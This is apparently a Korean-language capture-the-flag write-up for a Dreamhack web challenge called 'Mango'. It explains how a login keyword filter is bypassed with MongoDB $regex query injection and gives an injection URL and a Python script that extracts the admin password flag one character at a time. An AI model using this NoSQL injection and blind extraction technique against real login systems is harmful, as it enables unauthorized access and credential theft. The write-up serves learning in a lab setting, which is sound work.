[Web] Mango

필터링 함수를 보면 {admin, dh, admi} 이 들어가면 true를 반환한다.

로그인 페이지를 보면 필터에 걸리게 되면 filter를 반환하고 return 해버린다.

여기서는 쿼리 변수 타입을 검증하지 않기 때문에 injection 이 발생하게 된다.

• Exploit Code

<http://host3.dreamhack.games:16060/login?uid=admin&upw[$regex]=D.*>

여기서 DH를 우회할 수 있는 방법은 . 을 이용하는 방법이 있다.

주어진 코드에 있는 주석을 참고하여 alphanumeric 을 활용하여 코드를 작성하면

// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}

 

* Exploit Code

import requests, string

HOST = 'http://host3.dreamhack.games:9990'
ALPHANUMERIC = string.digits + string.ascii_letters

flag = ''
for i in range(32):
    for ch in ALPHANUMERIC:
        response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
        if response.text == 'admin':
            flag += ch
            break
    print(f'FLAG: DH{{{flag}}}')